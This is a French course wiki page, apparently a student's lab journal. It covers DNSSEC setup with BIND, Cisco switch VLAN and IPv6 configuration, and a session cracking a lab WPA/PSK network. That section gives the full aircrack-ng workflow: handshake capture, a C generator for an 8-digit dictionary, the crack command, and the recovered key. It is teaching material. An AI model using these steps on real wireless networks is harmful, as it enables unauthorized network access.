  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
